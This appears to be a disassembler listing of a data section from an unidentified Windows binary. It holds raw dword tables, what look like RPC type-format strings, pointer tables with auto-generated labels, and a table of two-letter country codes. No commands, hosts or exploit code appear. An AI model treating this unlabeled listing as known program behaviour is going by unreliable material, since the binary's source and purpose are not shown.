dd 180004h, 80008h, 3080647h, 1, 0B0000h, 20000h, 4010Bh
dd 10B00EEh, 0EE0008h, 0C0048h, 21130008h, 1AE0010h, 140070h
dd 48320008h, 0
dd 180005h, 240024h, 5080646h, 10000h, 0B0000h, 20000h
dd 4010Bh, 4800EEh, 80008h, 0C010Bh, 1A01E8h, 0E80010h
dd 140070h, 48320008h, 0
dd 0C0006h, 80000h, 1080346h, 0
dd 0B0000h, 20000h, 4010Bh, 7000EEh, 80008h, 4832h, 70000h
dd 10h, 4460008h, 108h, 0
dd 0Bh, 10B0002h, 0EE0004h, 8010Bh, 7000EEh, 8000Ch, 4832h
dd 80000h, 24001Ch, 7470040h, 30708h, 3, 0Bh, 0B0002h
dd 20004h, 8011Bh, 4802BEh, 8000Ch, 102150h, 1A0008h, 0E80014h
dd 180070h, 48320008h, 0
a@:
dw 9
unicode 0, < $@>
dd 7080847h, 30003h, 0B0000h, 20000h, 4000Bh, 0B0002h
dd 20008h, 0C011Bh, 480350h, 80010h, 142150h, 1A0008h
dd 0E80018h, 1C0070h, 48320008h, 0
dd 14000Ah, 80010h, 3080547h, 1, 0B0000h, 20000h, 40048h
dd 480008h, 80008h, 0C2113h, 700362h, 80010h, 4832h, 0B0000h
dd 8000Ch, 3460008h, 108h, 0
dd 0Bh, 480002h, 80004h, 80070h, 48320008h, 0
dd 20000Ch, 400024h, 7080847h, 60006h, 0B0000h, 20000h
dd 4000Bh, 0B0002h, 20008h, 0C011Bh, 48057Ch, 80010h, 142150h
dd 1A0008h, 0E80018h, 1C0070h, 48320008h, 0
dd 10000Dh, 80000h, 1080446h, 0
dd 0B0000h, 20000h, 4000Bh, 0B0002h, 20008h, 0C0070h, 48320008h
dd 0
dd 14000Eh, 240024h, 5080546h, 30000h, 0B0000h, 20000h
dd 40048h, 10B0008h, 58E0008h, 0C001Ah, 7000E8h, 80010h
dd 4832h, 0F0000h, 240018h, 6470040h, 70708h, 7, 0Bh, 11B0002h
dd 7CC0004h, 80048h, 21500008h, 8000Ch, 10001Ah, 7000E8h
dd 80014h, 4832h, 100000h, 80014h, 5470008h, 30308h, 0
dd 0Bh, 10B0002h, 0EE0004h, 80048h, 21130008h, 7DE000Ch
dd 100070h, 48320008h, 0
dd 180011h, 240024h, 5080646h, 30000h, 0B0000h, 20000h
dd 4010Bh, 4800EEh, 80008h, 0C010Bh, 1A0828h, 0E80010h
dd 140070h, 48320008h, 0
dd 100012h, 80008h, 1080446h, 0
dd 0B0000h, 20000h, 4010Bh, 4800EEh, 80008h, 0C0070h, 48320008h
dd 0
dd 100013h, 80008h, 1080446h, 0
dd 0B0000h, 20000h, 4010Bh, 4800EEh, 80008h, 0C0070h, 48320008h
dd 0
dd 100014h, 240000h, 1080446h, 0
dd 0B0000h, 20000h, 4010Bh, 215000EEh, 80008h, 0C0070h
dd 48320008h, 0
dd 100015h, 80008h, 3080447h, 1, 0B0000h, 20000h, 40048h
dd 21130008h, 8720008h, 0C0070h, 48320008h, 0
dd 140016h, 240024h, 5080546h, 10000h, 0B0000h, 20000h
dd 40048h, 10B0008h, 0BA80008h, 0C001Ah, 7000E8h, 80010h
dd 4832h, 170000h, 2C001Ch, 7470040h, 10708h, 1, 0Bh, 480002h
dd 80004h, 8011Bh, 480D46h, 8000Ch, 102150h, 1A0008h, 0E80014h
dd 180070h, 48320008h, 0
dd 180018h, 840010h, 1080646h, 0
dd 0B0000h, 20000h, 4000Bh, 480002h, 80008h, 0C0048h, 20120008h
dd 0D5A0010h, 140070h, 48320008h, 0
dd 100019h, 80008h, 5080446h, 10000h, 0B0000h, 20000h
dd 40048h, 10B0008h, 0D880008h, 0C0070h, 48320008h, 0
dd 18001Ah, 400024h, 7080647h, 90009h, 0B0000h, 20000h
dd 4011Bh, 480FD0h, 80008h, 0C2150h, 1A0008h, 0E80010h
dd 140070h, 48320008h, 0
dd 10001Bh, 80008h, 5080446h, 10000h, 0B0000h, 20000h
dd 40048h, 10B0008h, 0D880008h, 0C0070h, 48320008h, 0
dd 0C001Ch, 700000h, 1080346h, 0
dd 0B0000h, 20000h, 42012h, 700FDEh, 80008h, 4832h, 1D0000h
dd 100014h, 5460008h, 108h, 0
dd 0Bh, 0B0002h, 20004h, 80048h, 480008h, 8000Ch, 100070h
dd 48320008h, 0
dd 14001Eh, 240008h, 1080546h, 0
dd 0B0000h, 20000h, 4010Bh, 215000EEh, 80008h, 0C0048h
dd 700008h, 80010h
dword_9A22A4 dd 4832h, 1F0000h, 2C0020h, 8470024h, 10308h, 0 dd 0Bh, 10B0002h, 0EE0004h, 80113h, 880FFCh, 1008000Ch
dd 10010Bh, 15800EEh, 80014h, 180048h, 700008h, 8001Ch
dword_9A22EC dd 4832h, 200000h, 100018h, 6460008h, 108h, 0 dd 0Bh, 10B0002h, 0EE0004h, 8010Bh, 4800EEh, 8000Ch, 100048h
dd 700008h, 80014h, 4832h, 210000h, 100014h, 5460008h
dd 108h, 0
dd 0Bh, 10B0002h, 0EE0004h, 80048h, 480008h, 8000Ch, 100070h
dd 48320008h, 0
dd 1C0022h, 80018h, 3080747h, 1, 0B0000h, 20000h, 4010Bh
dd 11300EEh, 101A0008h, 0C0088h, 481026h, 80010h, 140048h
dd 700008h, 80018h, 4832h, 230000h, 100018h, 6460008h
dd 108h, 0
dd 0Bh, 10B0002h, 0EE0004h, 8010Bh, 4800EEh, 8000Ch, 100048h
dd 700008h, 80014h, 4832h, 240000h, 240018h, 6470040h
dd 70708h, 7, 0Bh, 11B0002h, 7CC0004h, 80048h, 21500008h
dd 8000Ch, 10001Ah, 7000E8h, 80014h, 4832h, 250000h, 80014h
dd 5460040h, 108h, 0
dd 0Bh, 10B0002h, 0EE0004h, 80048h, 1100008h, 1034000Ch
dd 100070h, 48000008h, 0
dd 80026h, 0E030h, 380000h, 2440040h, 108h, 0
dd 118h, 70103Ch, 80004h, 4832h, 270000h, 80018h, 6470008h
dd 10308h, 0
dd 0Bh, 0B0002h, 20004h, 8010Bh, 4800EEh, 8000Ch, 102013h
dd 701040h, 80014h, 4832h, 280000h, 80018h, 6460008h, 508h
dd 1, 0Bh, 0B0002h, 20004h, 8010Bh, 4800EEh, 8000Ch, 10010Bh
dd 700698h, 80014h, 4832h, 290000h, 80010h, 4460008h, 508h
dd 5, 0Bh, 480002h, 80004h, 8010Bh, 70104Ch, 8000Ch, 4832h
dd 2A0000h, 18001Ch, 7460008h, 108h, 0
dd 0Bh, 0B0002h, 20004h, 8000Bh, 480002h, 8000Ch, 100048h
dd 480008h, 80014h, 180070h, 48320008h, 0
dd 0C002Bh, 240000h, 1080346h, 0
dd 0B0000h, 20000h, 42150h, 700008h, 80008h, 4832h, 2C0000h
dd 4C0020h, 8460008h, 508h, 1, 0Bh, 10B0002h, 0EE0004h
dd 8010Ah, 10B107Eh, 0EE000Ch, 10010Bh, 10B00EEh, 10C80014h
dd 180048h, 700008h, 8001Ch, 4832h, 2D0000h, 440010h, 4460008h
dd 108h, 0
dd 0Bh, 10A0002h, 107E0004h, 8010Bh, 7000EEh, 8000Ch, 4832h
dd 2E0000h, 4C0014h, 5460008h, 108h, 0
dd 0Bh, 10A0002h, 107E0004h, 8010Bh, 4800EEh, 8000Ch, 100070h
dd 48320008h, 0
dd 10002Fh, 80044h, 1080446h, 0
dd 0B0000h, 20000h, 4010Ah, 10B107Eh, 0EE0008h, 0C0070h
dd 48320008h, 0
dd 1C0030h, 80054h, 3080747h, 1, 0B0000h, 20000h, 4010Ah
dd 10B107Eh, 0EE0008h, 0C0048h, 480008h, 80010h, 140113h
dd 7010E0h, 80018h, 4832h, 310000h, 4C0014h, 5460008h
dd 108h, 0
dd 0Bh, 10A0002h, 107E0004h, 8010Bh, 4800EEh, 8000Ch, 100070h
dd 48320008h, 0
dd 100032h, 80044h, 1080446h, 0
dd 0B0000h, 20000h, 4010Ah, 10B107Eh, 0EE0008h, 0C0070h
dd 48320008h, 0
a3:
unicode 0, <3(\>
dw 8
dd 5080A46h, 10000h, 0B0000h, 20000h, 4010Bh, 4800EEh
dd 80008h, 0C0048h, 10B0008h, 0EE0010h, 14010Ah, 10B107Eh
dd 0EE0018h, 1C010Bh, 4810C8h, 80020h, 240070h, 48320008h
dd 0
dword_9A276C dd 0C0034h, 80000h, 7080347h, 10001h, 0B0000h, 20000h
dd 4201Bh, 7010ECh, 80008h, 4832h, 350000h, 80010h, 4460008h
dd 508h, 5, 0Bh, 480002h, 80004h, 8010Bh, 701124h, 8000Ch
dd 3 dup(0)
dd 5C250812h, 0CE0011h, 8082Bh, 1FFFCh, 40002h, 2, 0A0000h
dd 1, 52h, 380012h, 40316h, 5C465C4Bh, 0
dd 5C250812h, 5B5C085Bh, 4031Bh, 18h, 5C4B0001h, 44948h
dd 10000h, 0
dd 5C250812h, 0CD004C5Bh, 3165BFFh, 5C4B0008h, 45C46h
dd 120004h, 85BFFD0h, 125B08h, 316004Ch, 5C4B0010h, 5C46h
dd 8120000h, 5C465C25h, 80008h, 5C250812h, 808085Bh, 31B5B08h
dd 180010h, 10000h, 49485C4Bh, 10h, 2, 8120000h, 85C25h
dd 8120008h, 4C5B5C25h, 5BFFB900h, 80316h, 5C465C4Bh, 40004h
dd 0FFC80012h, 5B08085Bh, 8031Ah, 0
dd 29004C08h, 0C115BFFh, 8125C08h, 8115C08h, 4115C25h
dd 82B0002h, 80028h, 20001h, 20004h, 0
dd 1000Ah, 80000h, 120000h, 12FF18h, 11FF62h, 82B0082h
dd 0FFFC0008h, 20001h, 20004h, 0
dd 1FEF8h, 40000h, 120000h, 316004Eh, 5C4B0014h, 5C46h
dd 8120000h, 5C465C25h, 80008h, 5C250812h, 808085Bh, 5B5C0808h
dd 14031Bh, 18h, 5C4B0001h, 144948h, 20000h, 0
dd 5C250812h, 80008h, 5C250812h, 0B7004C5Bh, 3165BFFh
dd 5C4B0008h, 45C46h, 120004h, 85BFFC8h, 31A5B08h, 8, 4C080000h
dd 5BFF7500h, 20411h, 28082Bh, 1000Ch, 40002h, 4, 0FF500000h
dd 1, 3EA0010h, 0E0000h, 3EBh, 0FF3Eh, 0FF640012h, 20012h
dd 40315h, 115B08h, 82B0002h, 80028h, 20001h, 40004h, 0
dd 1FF16h, 0FFD60000h, 3EAh, 3EBFFD4h, 0FF040000h, 110000h
dd 82B00ACh, 0FFFC0008h, 20001h, 20004h, 0
dd 1000Ah, 2C0000h, 120000h, 31B0012h, 180004h, 10000h
dd 0FF9E004Ch, 3165B5Ch, 5C4B0008h, 45C46h, 120004h, 85BFFE2h
dd 125B08h, 3160050h, 5C4B001Ch, 145C46h, 8120014h, 5C465C25h
dd 180018h, 5C250812h, 808085Bh, 8080808h, 31B5B5Ch, 18001Ch
dd 10000h, 49485C4Bh, 1Ch, 140002h, 8120014h, 185C25h
dd 8120018h, 4C5B5C25h, 5BFFB500h, 80316h, 5C465C4Bh, 40004h
dd 0FFC80012h, 5B08085Bh, 8031Ah, 0
dd 4B004C08h, 115BFFh, 82B0082h, 0FFFC0008h, 20001h, 20004h
dd 2, 3FF4Eh, 40000h, 120000h, 316004Eh, 5C4B0014h, 0C5C46h
dd 812000Ch, 5C465C25h, 100010h, 5C250812h, 808085Bh, 5B5C0808h
dd 14031Bh, 18h, 5C4B0001h, 144948h, 20000h, 0C000Ch, 5C250812h
dd 100010h, 5C250812h, 0B7004C5Bh, 3165BFFh, 5C4B0008h
dd 45C46h, 120004h, 85BFFC8h, 31A5B08h, 8, 4C080000h, 5BFF7500h
dd 20411h, 28082Bh, 10008h, 40002h, 20002h, 0FE660000h
dd 3, 4, 0FF700012h, 1F80011h, 8082Bh, 1FFFCh, 40002h
dd 5, 0FC8E0000h, 1, 20016h, 740000h, 0Ah, 1F600E6h, 1420000h
dd 120000h, 316004Eh, 5C4B0018h, 5C46h, 8120000h, 5C465C25h
dd 40004h, 5C250812h, 808085Bh, 5B080808h, 18031Bh, 18h
dd 5C4B0001h, 184948h, 20000h, 0
dd 5C250812h, 40004h, 5C250812h, 0B7004C5Bh, 3165BFFh
dd 5C4B0008h, 45C46h, 120004h, 85BFFC8h, 125B08h, 3160062h
dd 5C4B001Ch, 5C46h, 8120000h, 5C465C25h, 40004h, 5C250812h
dd 185C46h, 8120018h, 85B5C25h, 8080808h, 5B5C0808h, 1C031Bh
dd 18h, 5C4B0001h, 1C4948h, 30000h, 0
dd 5C250812h, 40004h, 5C250812h, 180018h, 5C250812h, 0A3004C5Bh
dd 3165BFFh, 5C4B0008h, 45C46h, 120004h, 85BFFC0h, 125B08h
dd 316004Ch, 5C4B0010h, 5C46h, 8120000h, 5C465C25h, 40004h
dd 5C250812h, 808085Bh, 31B5B08h, 180010h, 10000h, 49485C4Bh
dd 10h, 2, 8120000h, 45C25h, 8120004h, 4C5B5C25h, 5BFFB900h
dd 80316h, 5C465C4Bh, 40004h, 0FFC80012h, 5B08085Bh, 740012h
dd 200316h, 5C465C4Bh, 0
dd 5C250812h, 45C46h, 8120004h, 5C465C25h, 180018h, 5C250812h
dd 1C5C46h, 812001Ch, 85B5C25h, 8080808h, 5B080808h, 20031Bh
dd 18h, 5C4B0001h, 204948h, 40000h, 0
dd 5C250812h, 40004h, 5C250812h, 180018h, 5C250812h, 1C001Ch
dd 5C250812h, 91004C5Bh, 3165BFFh, 5C4B0008h, 45C46h, 120004h
dd 85BFFB8h, 31A5B08h, 8, 4C080000h, 5BFDFF00h, 20011h
dd 28082Bh, 10004h, 40002h, 9, 0FB700000h, 1, 2002Eh, 4C0000h
dd 1F6h, 3EC0082h, 0FB580000h, 3EEh, 5DDFC1Ch, 0C40000h
dd 3EDh, 1F5FC10h, 0FB440000h, 120000h, 3160002h, 5C4B000Ch
dd 5C46h, 8120000h, 5C465C25h, 80008h, 5C250812h, 808085Bh
dd 125B5Ch, 3160002h, 5C4B0020h, 5C46h, 8120000h, 5C465C25h
dd 80008h, 5C250812h, 185C46h, 8120018h, 5C465C25h, 1C001Ch
dd 5C250812h, 808085Bh, 8080808h, 125B08h, 1B000Eh, 180001h
dd 10020h, 3165B02h, 5C4B0028h, 5C46h, 8120000h, 5C465C25h
dd 80008h, 5C250812h, 185C46h, 8120018h, 5C465C25h, 1C001Ch
dd 5C250812h, 245C46h, 120024h, 85BFFBEh, 2 dup(8080808h)
dd 125B08h, 1B000Eh, 180001h, 10000h, 3165B02h, 5C4B0008h
dd 45C46h, 120004h, 85BFFE6h, 115B08h, 82B011Eh, 0FFFC0008h
dd 20001h, 50004h, 0
dd 1F964h, 160000h, 2, 1F60052h, 9E0000h, 1F5h, 0F99Ah
dd 2C0012h, 0C031Bh, 18h, 5C4B0001h, 0C4948h, 20000h, 0
dd 5C250812h, 80008h, 5C250812h, 0CF004C5Bh, 3165BFEh
dd 5C4B0008h, 45C46h, 120004h, 85BFFC8h, 125B08h, 31B003Ch
dd 180020h, 10000h, 49485C4Bh, 20h, 4, 8120000h, 85C25h
dd 8120008h, 185C25h, 8120018h, 1C5C25h, 812001Ch, 4C5B5C25h
dd 5BFEA100h, 80316h, 5C465C4Bh, 40004h, 0FFB80012h, 5B08085Bh
dd 440012h, 28031Bh, 18h, 5C4B0001h, 284948h, 50000h, 0
dd 5C250812h, 80008h, 5C250812h, 180018h, 5C250812h, 1C001Ch
dd 5C250812h, 240024h, 0FE880012h, 8F004C5Bh, 3165BFEh
dd 5C4B0008h, 45C46h, 120004h, 85BFFB0h, 31A5B08h, 8, 4C080000h
dd 5BFED900h, 20411h, 28082Bh, 10008h, 40002h, 9, 0F9200000h
dd 1, 2FDDEh, 0FDFC0000h, 1F6h, 3ECFE32h, 0F9080000h, 3EEh
dd 5DDF9CCh, 0FE740000h, 3EDh, 1F5F9C0h, 0F8F40000h, 110000h
dd 82B0002h, 80028h, 20001h, 90004h, 0
dd 1F8D6h, 0FD940000h, 2, 1F6FDB2h, 0FDE80000h, 3ECh, 3EEF8BEh
dd 0F9820000h, 5DDh, 3EDFE2Ah, 0F9760000h, 1F5h, 0F8AAh
dd 20411h, 28082Bh, 10004h, 40002h, 64003Bh, 1600000h
dd 65h, 660172h, 1920000h, 192h, 19301C4h, 2080000h, 1F6h
dd 1F70258h, 26E0000h, 257h, 3ED02A8h, 0F85C0000h, 453h
dd 3F2F920h, 0F91A0000h, 3F8h, 3F9F914h, 0F90E0000h, 3FAh
dd 5DDF908h, 0F9020000h, 5DEh, 5DFF8FCh, 0F8F60000h, 5E2h
dd 5E5F8F0h, 0F8EA0000h, 5E6h, 5E7F8E4h, 0F8DE0000h, 5E8h
dd 5E9F8D8h, 0F8D20000h, 5EAh, 5EBF8CCh, 0F8C60000h, 5ECh
dd 5EEF8C0h, 0F8BA0000h, 5F0h, 5F1F8B4h, 0F8AE0000h, 5F2h
dd 5F3F8A8h, 0F8A20000h, 5F4h, 5F5F89Ch, 0F8960000h, 5F8h
dd 5F9F890h, 0F88A0000h, 5FAh, 5FDF884h, 0F87E0000h, 5FEh
dd 5FFF878h, 0F8720000h, 600h, 601F86Ch, 0F8660000h, 602h
dd 603F860h, 0F85A0000h, 604h, 605F854h, 0F84E0000h, 606h
dd 607F848h, 0F8420000h, 608h, 609F83Ch, 0F8360000h, 60Ah
dd 60BF830h, 0F82A0000h, 60Ch, 60DF824h, 0F81E0000h, 60Eh
dd 610F818h, 0F8120000h, 611h, 612F80Ch, 0F8060000h, 613h
dd 614F800h, 0F7FA0000h, 120000h, 3160002h, 5C4B0008h
dd 45C46h, 8120004h, 85B5C25h, 125B08h, 3160002h, 5C4B0018h
dd 45C46h, 8120004h, 5C465C25h, 140014h, 5C250812h, 808085Bh
dd 5B080808h, 20012h, 340316h, 5C465C4Bh, 40004h, 5C250812h
dd 145C46h, 8120014h, 5C465C25h, 300030h, 5C250812h, 808085Bh
dd 2 dup(8080808h), 5B5C0808h, 20012h, 7C0316h, 5C465C4Bh
dd 0C000Ch, 5C250812h, 1C5C46h, 812001Ch, 5C465C25h, 780078h
dd 5C250812h, 808085Bh, 7 dup(8080808h), 125B5Ch, 3160002h
dd 5C4B0088h, 0C5C46h, 812000Ch, 5C465C25h, 1C001Ch, 5C250812h
dd 785C46h, 8120078h, 5C465C25h, 840084h, 5C250812h, 808085Bh
dd 7 dup(8080808h), 5B080808h, 20012h, 480315h, 4 dup(8080808h)
dd 5B5C0808h, 20012h, 0A80316h, 5C465C4Bh, 480048h, 5C250812h
dd 808085Bh, 9 dup(8080808h), 5B080808h, 20012h, 0E00316h
dd 5C465C4Bh, 480048h, 5C250812h, 808085Bh, 0Dh dup(8080808h)
dd 115B08h, 82B0002h, 40028h, 20001h, 3B0004h, 64h, 65FE2Ah
dd 0FE3C0000h, 66h, 192FE5Ch, 0FE8E0000h, 193h, 1F6FED2h
dd 0FF220000h, 1F7h, 257FF38h, 0FF720000h, 3EDh, 453F526h
dd 0F5EA0000h, 3F2h, 3F8F5E4h, 0F5DE0000h, 3F9h, 3FAF5D8h
dd 0F5D20000h, 5DDh, 5DEF5CCh, 0F5C60000h, 5DFh, 5E2F5C0h
dd 0F5BA0000h, 5E5h, 5E6F5B4h, 0F5AE0000h, 5E7h, 5E8F5A8h
dd 0F5A20000h, 5E9h, 5EAF59Ch, 0F5960000h, 5EBh, 5ECF590h
dd 0F58A0000h, 5EEh, 5F0F584h, 0F57E0000h, 5F1h, 5F2F578h
dd 0F5720000h, 5F3h, 5F4F56Ch, 0F5660000h, 5F5h, 5F8F560h
dd 0F55A0000h, 5F9h, 5FAF554h, 0F54E0000h, 5FDh, 5FEF548h
dd 0F5420000h, 5FFh, 600F53Ch, 0F5360000h, 601h, 602F530h
dd 0F52A0000h, 603h, 604F524h, 0F51E0000h, 605h, 606F518h
dd 0F5120000h, 607h, 608F50Ch, 0F5060000h, 609h, 60AF500h
dd 0F4FA0000h, 60Bh, 60CF4F4h, 0F4EE0000h, 60Dh, 60EF4E8h
dd 0F4E20000h, 610h, 611F4DCh, 0F4D60000h, 612h, 613F4D0h
dd 0F4CA0000h, 614h, 0F4C4h, 2A0011h, 35C29h, 6011Ah, 0
dd 0FFF2004Ch, 1215B5Ch, 180000h, 10000h, 18h, 4C0001h
dd 5B5CFFE0h, 80316h, 5C465C4Bh, 40004h, 0FFDC0012h, 5B08085Bh
dd 21411h, 20012h, 440315h, 4 dup(8080808h), 115B08h, 1B000Eh
dd 180001h, 0Ch, 3165B02h, 5C4B0014h, 45C46h, 8120004h
dd 5C465C25h, 80008h, 0FFDC0012h, 105C46h, 8120010h, 85B5C25h
dd 8080808h, 115B5Ch, 82B021Ah, 0FFFC0008h, 20001h, 40004h
dd 0
dd 10016h, 5A0000h, 2, 300DCh, 1600000h, 120000h, 31B0034h
dd 180014h, 10000h, 49485C4Bh, 14h, 40003h, 8120004h, 85C25h
dd 120008h, 10FF76h, 8120010h, 4C5B5C25h, 5BFF7500h, 80316h
dd 5C465C4Bh, 40004h, 0FFC00012h, 5B08085Bh, 720012h, 180316h
dd 5C465C4Bh, 40004h, 5C250812h, 85C46h, 120008h, 5C46FF36h
dd 100010h, 5C250812h, 145C46h, 8120014h, 85B5C25h, 8080808h
dd 31B5B08h, 180018h, 10000h, 49485C4Bh, 18h, 40004h, 8120004h
dd 85C25h, 120008h, 10FEF6h, 8120010h, 145C25h, 8120014h
dd 4C5B5C25h, 5BFF9300h, 80316h, 5C465C4Bh, 40004h, 0FFB80012h
dd 5B08085Bh, 740012h, 1C0316h, 5C465C4Bh, 40004h, 5C250812h
dd 85C46h, 120008h, 5C46FEAEh, 100010h, 5C250812h, 145C46h
dd 8120014h, 85B5C25h, 8080808h, 5B5C0808h, 1C031Bh, 18h
dd 5C4B0001h, 1C4948h, 40000h, 40004h, 5C250812h, 80008h
dd 0FE6C0012h, 100010h, 5C250812h, 140014h, 5C250812h
dd 91004C5Bh, 3165BFFh, 5C4B0008h, 45C46h, 120004h, 85BFFB8h
dd 125B08h, 1D007Eh, 5B020100h, 1200316h, 5C465C4Bh, 40004h
dd 5C250812h, 85C46h, 120008h, 5C46FE1Eh, 100010h, 5C250812h
dd 145C46h, 8120014h, 85B5C25h, 8080808h, 4C080808h, 5BFFC100h
dd 120031Bh, 18h, 5C4B0001h, 1204948h, 40000h, 40004h
dd 5C250812h, 80008h, 0FDD80012h, 100010h, 5C250812h, 140014h
dd 5C250812h, 8D004C5Bh, 3165BFFh, 5C4B0008h, 45C46h, 120004h
dd 85BFFB8h, 31A5B08h, 8, 4C080000h, 5BFDDD00h, 21411h
dd 20012h, 300315h, 3 dup(8080808h), 115B5Ch, 1B0002h
dd 280001h, 0Ch, 8B75B02h, 0
dd 0FA00h, 5C080811h, 20011h, 2011Bh, 0C0028h, 5B050000h
dd 8B7h, 0FA000000h, 4110000h, 0A0300002h, 4110000h, 0E1300002h
dd 14110000h, 11F646h, 11F652h, 82B0002h, 40028h, 20001h
dd 40120h, 0
dd 1FD2Ah, 0FDCA0000h, 2, 3FE4Ch, 0FED60000h, 110000h
dd 1D0008h, 5B010008h, 100315h, 4C060608h, 5BFFF100h, 3C0011h
dd 140316h, 5C465C4Bh, 100010h, 5C250812h, 0DD004C5Bh
dd 5B5C08FFh, 14031Bh, 18h, 5C4B0001h, 144948h, 10000h
dd 100010h, 5C250812h, 0C9004C5Bh, 3165BFFh, 5C4B0008h
dd 45C46h, 120004h, 85BFFD0h, 115B08h, 11B0002h, 280002h
dd 10010h, 14125B05h, 120002h, 31B0012h, 80008h, 1FFFCh
dd 0F8E8004Ch, 3185B5Ch, 0FFEC0004h, 49485C4Bh, 40008h
dd 80001h, 8120008h, 85B5C25h, 115B5Ch, 82B0002h, 40028h
dd 20001h, 40120h, 0
dd 1FC52h, 0FCF20000h, 2, 3FD74h, 0FDFE0000h, 0
dd 3C0000h, 0A20072h, 12000E4h, 186015Ch, 1F801B6h, 2760240h
dd 2E802A0h, 34E0318h, 3C0038Ah, 42C03FCh, 48C045Ch, 4F204BCh
dd 5700534h, 5DC05A0h, 636060Ch, 6A2066Ch, 72606EAh, 79E075Ch
dd 81607DAh, 876084Ch, 8EE08B2h, 960091Eh, 9D2098Ah, 0A380A02h
dd 0AAA0A68h, 0B100AE0h, 0B8E0B64h, 0
off_9A3988 dd offset dword_9A1BB8 ; DATA XREF: sub_9AC417+D�o
; sub_9AC439+D�o
dd offset sub_9A7348
dd offset sub_9A7356
dd offset dword_9B785C
dd 4 dup(0)
dd offset dword_9A276C+5Eh
dd 1, 50002h, 0
dd 600016Eh, 3 dup(0)
dd 1, 3 dup(0)
off_9A39D8 dd offset dword_9A3DE8 ; DATA XREF: .text:off_9B53E0�o
dd offset dword_9A3DE4
dd offset dword_9A3DE0
dd offset dword_9A3DDC
dd offset dword_9A3DD8
dd offset dword_9A3DD4
dd offset dword_9A3DD0
dd offset dword_9A3DCC
dd offset dword_9A3DC8
dd offset dword_9A3DC4
dd offset dword_9A3DC0
dd offset dword_9A3DBC
dd offset dword_9A3DB8
dd offset dword_9A3DB4
dd offset dword_9A3DB0
dd offset dword_9A3DAC
dd offset dword_9A3DA8
dd offset dword_9A3DA4
dd 0
off_9A3A24 dd offset dword_9A3DA0 ; DATA XREF: .text:009B53E8�o
dd 0
dd offset dword_9A3D9C
dd 0
dd offset dword_9A3D98
dd offset dword_9A3D94
dd offset dword_9A3D90
dd offset dword_9A3D8C
align 8
dd offset dword_9A3D88
align 10h
dd offset dword_9A3D84
align 8
dd offset dword_9A3D80
dd offset dword_9A3D7C
dd offset dword_9A3D78
dd offset dword_9A3D74
dd offset dword_9A3D70
align 10h
dd offset dword_9A3D6C
align 8
dd offset dword_9A3D68
dd offset dword_9A3D64
dd offset dword_9A3D60
dd offset dword_9A3D5C
dd offset dword_9A3D58
dd offset dword_9A3D54
dd offset dword_9A3D50
dd offset dword_9A3D4C
dd offset dword_9A3D48
dd offset dword_9A3D44
dd offset dword_9A3D40
dd offset dword_9A3D3C
dd offset dword_9A3D38
dd offset dword_9A3D34
dd offset dword_9A3D30
dd offset dword_9A3D2C
dd offset dword_9A3D28
dd offset dword_9A3D24
dd offset dword_9A3D20
dd offset dword_9A3D1C
dd offset dword_9A3D18
dd offset dword_9A3D14
dd offset dword_9A3D10
dd offset dword_9A3D0C
dd offset dword_9A3D58
dd offset dword_9A3D08
dd offset dword_9A3D04
dd offset dword_9A3D00
dd offset dword_9A3CFC
dd offset dword_9A3D50
dd offset dword_9A3D4C
align 8
dd offset dword_9A3CF8
dd offset dword_9A3CF4
dd offset dword_9A3CF0
dd offset dword_9A3CEC
dd offset dword_9A3CE8
align 10h
dd offset dword_9A3CE4
dd offset dword_9A3CE0
dd 0
dd offset dword_9A3CDC
dd 0
dd offset dword_9A3CD8
dd offset dword_9A3D70
dd offset dword_9A3CD4
dd 0
dd offset dword_9A3CD0
dd 0
dd offset dword_9A3CCC
dd 0
dd offset dword_9A3CC8
dd offset dword_9A3CC4
align 10h
dd offset dword_9A3CC0
dd offset dword_9A3CBC
dd offset dword_9A3CB8
align 10h
dd offset dword_9A3CB4
align 8
dd offset dword_9A3D80
dd offset dword_9A3CB0
dd offset dword_9A3CAC
dd offset dword_9A3CA8
dd offset dword_9A3CA4
dd offset dword_9A3CA0
dd offset dword_9A3C9C
align 8
dd offset dword_9A3C98
dd offset dword_9A3C94
dd offset dword_9A3C90
dd offset dword_9A3C8C
dd offset dword_9A3C88
dd offset dword_9A3C84
dd offset dword_9A3C80
dd offset dword_9A3C7C
dd offset dword_9A3C78
dd offset dword_9A3C74
dd 2 dup(0)
dd offset dword_9A3C70
dd offset dword_9A3C6C
dd offset dword_9A3C68
dd offset dword_9A3C64
dd offset dword_9A3C60
dd offset dword_9A3C5C
dd offset dword_9A3C58
dd offset dword_9A3C54
dd offset dword_9A3C50
dd offset dword_9A3C4C
dd offset dword_9A3C48
dd offset dword_9A3C44
dd offset dword_9A3C40
dd offset dword_9A3C3C
dd offset dword_9A3C38
dd offset dword_9A3C34
dd offset dword_9A3C30
dd offset dword_9A3C2C
dd offset dword_9A3C28
align 8
dd offset dword_9A3C24
dd offset dword_9A3C20
dd 0
dd offset dword_9A3C1C
dd 0
dword_9A3C1C dd 5254h dword_9A3C20 dd 4553h dword_9A3C24 dd 5841h dword_9A3C28 dd 4556h dword_9A3C2C dd 5653h dword_9A3C30 dd 5950h dword_9A3C34 dd 4550h dword_9A3C38 dd 4150h dword_9A3C3C dd 494Eh dword_9A3C40 dd 584Dh dword_9A3C44 dd 4E48h dword_9A3C48 dd 4447h dword_9A3C4C dd 5447h dword_9A3C50 dd 5345h dword_9A3C54 dd 4345h dword_9A3C58 dd 5543h dword_9A3C5C dd 5243h dword_9A3C60 dd 4F43h dword_9A3C64 dd 4C43h dword_9A3C68 dd 4F42h dword_9A3C6C dd 5241h dword_9A3C70 dd 4441h dword_9A3C74 dd 5A55h dword_9A3C78 dd 4155h ; sub_9AC747+7C�o
dword_9A3C7C dd 4D54h dword_9A3C80 dd 4A54h dword_9A3C84 dd 5553h dword_9A3C88 dd 5552h dword_9A3C8C dd 444Dh dword_9A3C90 dd 5A4Bh dword_9A3C94 dd 474Bh dword_9A3C98 dd 5942h dword_9A3C9C dd 5054h dword_9A3CA0 dd 4C54h dword_9A3CA4 dd 5450h dword_9A3CA8 dd 5A4Dh dword_9A3CAC dd 5747h dword_9A3CB0 dd 5643h dword_9A3CB4 dd 4C50h dword_9A3CB8 dd 4A53h dword_9A3CBC dd 4F4Eh dword_9A3CC0 dd 5642h dword_9A3CC4 dd 524Bh dword_9A3CC8 dd 504Bh dword_9A3CCC dd 504Ah dword_9A3CD0 dd 4C49h dword_9A3CD4 dd 4156h dword_9A3CD8 dd 5449h dword_9A3CDC dd 5548h dword_9A3CE0 dd 5247h dword_9A3CE4 dd 5943h dword_9A3CE8 dd 494Ch dword_9A3CEC dd 554Ch dword_9A3CF0 dd 4843h 